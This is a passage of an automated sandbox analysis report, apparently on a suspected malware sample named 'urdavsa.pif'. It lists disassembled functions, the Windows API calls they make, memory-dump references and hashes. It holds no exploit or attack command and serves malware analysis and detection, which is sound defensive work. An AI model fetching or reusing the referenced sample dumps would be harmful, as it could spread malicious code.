                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID:
                            • API String ID: 1020059152-0
                            • Opcode ID: 86c727cd6a3bf24ac622190fe402552565216346864c018e9b9cd3b36572bbde
                            • Instruction ID: e06d099bc82893d2976a79515fba8ce8795f0f3a8a33510bc7afac8428380980
                            • Opcode Fuzzy Hash: 86c727cd6a3bf24ac622190fe402552565216346864c018e9b9cd3b36572bbde
                            • Instruction Fuzzy Hash: A411C133504258AFCB393BB4ED0469F37A8DF573A1F218435F8488B1E0EF35885186A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA7726, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00AA7732
                              • Part of subcall function 00AA798C: __getptd_noexit.LIBCMT ref: 00AA798F
                              • Part of subcall function 00AA798C: __amsg_exit.LIBCMT ref: 00AA799C
                            • __getptd.LIBCMT ref: 00AA7749
                            • __amsg_exit.LIBCMT ref: 00AA7757
                            • __lock.LIBCMT ref: 00AA7767
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00AA777B
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                            • String ID:
                            • API String ID: 938513278-0
                            • Opcode ID: 72068605d3514ff7ef46506e7000ae8d15fe2f0874506aee1ca9faca9aed3629
                            • Instruction ID: 29683093b1be75d7bca2d725c8d2bd23f24eb8bdbfa0f9e20be753c5d3dfe622
                            • Opcode Fuzzy Hash: 72068605d3514ff7ef46506e7000ae8d15fe2f0874506aee1ca9faca9aed3629
                            • Instruction Fuzzy Hash: B4F09A33E487109BD760BB789E03B6F73A0AF03720F14015AF111AB2D2DF2859419B99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA08E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00A9E820), ref: 00AA08EB
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA08FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: b3352f8f1d3abed4ac40a33e19b99f64daf0f4375ac63f5cbd472931c40b93b1
                            • Instruction ID: c9edbeaacb37e5a82f18e6ac399543a8920d2f7e5864e0f0a4dcec6c0952ffc3
                            • Opcode Fuzzy Hash: b3352f8f1d3abed4ac40a33e19b99f64daf0f4375ac63f5cbd472931c40b93b1
                            • Instruction Fuzzy Hash: 9CD0C9B0900B06DEE7300F61E848A4376E4AB41781F508468A4A2931A5DBB4C0D08A64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA0870, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00A9E7C8), ref: 00AA087B
                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AA088D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsWow64Process$kernel32.dll
                            • API String ID: 2574300362-3024904723
                            • Opcode ID: 57ff108a52a696191ca2d713646027e3fb83bf0588faf31887322cf63fb49925
                            • Instruction ID: 79c251890827244decaca2e269a42578bb803fc6aa9135cfe12649f0cbc822d5
                            • Opcode Fuzzy Hash: 57ff108a52a696191ca2d713646027e3fb83bf0588faf31887322cf63fb49925
                            • Instruction Fuzzy Hash: 19D012F0900B03DFD7301F21EC08A4276E4AB45792F5084ACA4B6D31A0DFB8C0D0CAB8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE1CA1, Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8dd3ae20ff65bb3d72544f5a874ef321ae77274093263f13036caf615156911
                            • Instruction ID: f1e0b73efc3f9a54110a009c350fe8e9994b9c5a9cb4f55fe8b9352d4947b8c7
                            • Opcode Fuzzy Hash: b8dd3ae20ff65bb3d72544f5a874ef321ae77274093263f13036caf615156911
                            • Instruction Fuzzy Hash: E9E14B75600219AFCB14DF99D880EAAB7B9FF88314F148599F909DB351D731EE41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B094BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00B094C9
                            • SysAllocString.OLEAUT32(00000000), ref: 00B09592
                            • VariantCopy.OLEAUT32(?,?), ref: 00B095C9
                            • VariantClear.OLEAUT32(?), ref: 00B0960A
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: b5210c019cd869506b430c40ae0ac7b6c36b52c77a1ca7d32edea2498a98e35e
                            • Instruction ID: 20e865d1bdd6e7a81c2cf12b29baa29c415da4287980749c745ff4e7ca51c18a
                            • Opcode Fuzzy Hash: b5210c019cd869506b430c40ae0ac7b6c36b52c77a1ca7d32edea2498a98e35e
                            • Instruction Fuzzy Hash: 5251D535310209A6CB00FF29E9415AA7BA4FF84351F90866AFD0587292DB319A25C7E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                            • Instruction ID: 299e91b3b862ecf76e35b47136b71515df26d526bdeac2c1c88a2d719d76ed57
                            • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                            • Instruction Fuzzy Hash: 4941D231A007049BDB258FA9C9846AFBBB5AFDA360F24862CF515972C0D7F4DE91DB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB075F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AB0793
                            • __isleadbyte_l.LIBCMT ref: 00AB07C6
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00AB07F7
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00AB0865
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 80eee987d9db0171e037911850798a0d964bb70691a9757320e936a19cae34e0
                            • Instruction ID: ae2cf32324f89ab51393fa1e10abd65e98a3f169a3cab9ad637a1bdaaf346099
                            • Opcode Fuzzy Hash: 80eee987d9db0171e037911850798a0d964bb70691a9757320e936a19cae34e0
                            • Instruction Fuzzy Hash: 7F317371A00245EFDB20DFA4C884EEF7BB9BF01310F198569E4659B192DB31ED90DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E2C0, Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00A9E2E2
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A9E3A7
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconNotifyShell__memset
                            • String ID:
                            • API String ID: 928536360-0
                            • Opcode ID: b486b34a08ea5a995867396caa863de65cc00f1bf79fde62cd4c526b2accc14e
                            • Instruction ID: aa233b2c759e4e16c89e4aeff9db9e394be63eeceef6017e6b33a3cba7da34fb
                            • Opcode Fuzzy Hash: b486b34a08ea5a995867396caa863de65cc00f1bf79fde62cd4c526b2accc14e
                            • Instruction Fuzzy Hash: C9318DB0608741DFE720DF24D8557A7BBE8FB89304F10481DE5EA87281EBB0A948CF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC494A, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                            • String ID:
                            • API String ID: 1597257046-0
                            • Opcode ID: df738021e0c63cb1ae39155470d7067c9b09d5667cc6beb4a862c3a589a89186
                            • Instruction ID: 698cf4a76b4a6e75d83bd70287e51b4d2c8455a794f33257cb15bffd1ae10251
                            • Opcode Fuzzy Hash: df738021e0c63cb1ae39155470d7067c9b09d5667cc6beb4a862c3a589a89186
                            • Instruction Fuzzy Hash: 2E0162712002407FC314EB69C986D27B3ADEB8A350F00852DF55587681DB35EC408760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                            Download Yara Rule
                            APIs
                            • __getptd_noexit.LIBCMT ref: 00AA5070
                              • Part of subcall function 00AA7913: GetLastError.KERNEL32(00000003,?,00AA7994,?,00AA1259,?,?,00AA12DC,?,00000001), ref: 00AA7917
                              • Part of subcall function 00AA7913: ___set_flsgetvalue.LIBCMT ref: 00AA7925
                              • Part of subcall function 00AA7913: __calloc_crt.LIBCMT ref: 00AA7939
                              • Part of subcall function 00AA7913: __initptd.LIBCMT ref: 00AA7962
                              • Part of subcall function 00AA7913: GetCurrentThreadId.KERNEL32 ref: 00AA7969
                              • Part of subcall function 00AA7913: SetLastError.KERNEL32(00000000,?,00AA12DC,?,00000001), ref: 00AA7981
                            • CloseHandle.KERNEL32(?,?,00AA50BB), ref: 00AA5084
                            • __freeptd.LIBCMT ref: 00AA508B
                            • ExitThread.KERNEL32 ref: 00AA5093
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                            • String ID:
                            • API String ID: 2246029678-0
                            • Opcode ID: 46d08bef33b881d592685315e9217cb8bf7ccb64447b1f09137f8a191cc70541
                            • Instruction ID: c2a32b31f7f33e030ffafc03da3f28df0c7f366b6bc97567404e1fa86a0ea885
                            • Opcode Fuzzy Hash: 46d08bef33b881d592685315e9217cb8bf7ccb64447b1f09137f8a191cc70541
                            • Instruction Fuzzy Hash: 65D0A932805E206FC2356334AC0DB5F33699F42B31B144B00F4358B4D2CF28CE5286E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID: ?T
                            • API String ID: 4104443479-3504941901
                            • Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                            • Instruction ID: 321e11fc5affac10bb17f76013f437f2fb6263fdee530b90063499d2f11f271a
                            • Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
                            • Instruction Fuzzy Hash: 9B1193B2610119AFCB04DFA5D8C0DAE73ACEB04344B504579EA06D7601E735FE15C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADCDB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 00ADCDEE
                            • _memmove.LIBCMT ref: 00ADCE15
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ArrayCreateSafeVector_memmove
                            • String ID: crts
                            • API String ID: 564309351-3724388283
                            • Opcode ID: 05d577b8dd45ebabf6ec901815429598b8274320243fb6f4bc04841574b2b5e3
                            • Instruction ID: 13f1e1f55e181ff399e16e7fa711f2272628d179a81b8385936cbf0b0639dd8b
                            • Opcode Fuzzy Hash: 05d577b8dd45ebabf6ec901815429598b8274320243fb6f4bc04841574b2b5e3
                            • Instruction Fuzzy Hash: C401ADB7A00109ABC710DF99EC45E9B77A8EB44310F50422AFA0897201D731EA16C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC2175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 2fd21c40c6326d5796edbf5cfb6af6f1f7df482eaede14336e252a029163de0f
                            • Instruction ID: 020bd1ef9d22d611425e3e672aee290781de7fc8725ab4bb095e037577852ccc
                            • Opcode Fuzzy Hash: 2fd21c40c6326d5796edbf5cfb6af6f1f7df482eaede14336e252a029163de0f
                            • Instruction Fuzzy Hash: C70149329042187BCB18DBA88C12FFEBBF49F45301F04859DF596932C1D674A618C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: urdavsa.pif PID: 5708 Parent PID: 2520 urdavsa.pifCOMMON

                            Executed Functions

                            Function 00A998F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00A99911
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00A9995C
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00A999A3
                            • _memmove.LIBCMT ref: 00A99FE6
                            • _memmove.LIBCMT ref: 00A9A914
                            • _memmove.LIBCMT ref: 00AB9769
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                            • String ID:
                            • API String ID: 2383988440-0
                            • Opcode ID: ca6c72dd12c40bde1239571821ef4f2d951b4af7dbfca23ac0599ec5b48b7d2f
                            • Instruction ID: 8fbbf2e780c7ea5831ad3ea4ea90b64f9dd638cf937637bbf8668ebd34553109
                            • Opcode Fuzzy Hash: ca6c72dd12c40bde1239571821ef4f2d951b4af7dbfca23ac0599ec5b48b7d2f
                            • Instruction Fuzzy Hash: 8B136DB4608340DFDB24DF28C581A6AB7F5BF99300F24895EE58A8B352D735EC45CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A935F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00A93681
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A93697
                            • __wsplitpath.LIBCMT ref: 00A936C2
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcscpy.LIBCMT ref: 00A936D7
                            • _wcscat.LIBCMT ref: 00A936EC
                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 00A936FC
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                              • Part of subcall function 00A93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00A9378C,?,?,?,00000010), ref: 00A93D38
                              • Part of subcall function 00A93D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00A93D71
                            • _wcscpy.LIBCMT ref: 00A937D0
                            • _wcslen.LIBCMT ref: 00A93853
                            • _wcslen.LIBCMT ref: 00A938AD
                            Strings
                            • Unterminated string, xrefs: 00AB82C6
                            • _, xrefs: 00A9394C
                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00AB817E
                            • Error opening the file, xrefs: 00AB81AF
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                            • API String ID: 3393021363-188983378
                            • Opcode ID: 8e6d5e18b63fafa3d190cab64f06282431f6315307fe4d3be2b60efe516cb95c
                            • Instruction ID: d4a2708a853bf8a670b95217b683f52944bf637bc7a3e1a51b28c929129af3a8
                            • Opcode Fuzzy Hash: 8e6d5e18b63fafa3d190cab64f06282431f6315307fe4d3be2b60efe516cb95c
                            • Instruction Fuzzy Hash: 3AD1AEB2608341AADF10EF68C941AEFB7F8AF95300F04892DF58647142DB75DA49C7A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,00000000), ref: 00AC39AC
                            • FindFirstFileW.KERNEL32(?,?), ref: 00AC39BD
                            • FindClose.KERNEL32(00000000), ref: 00AC39D0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
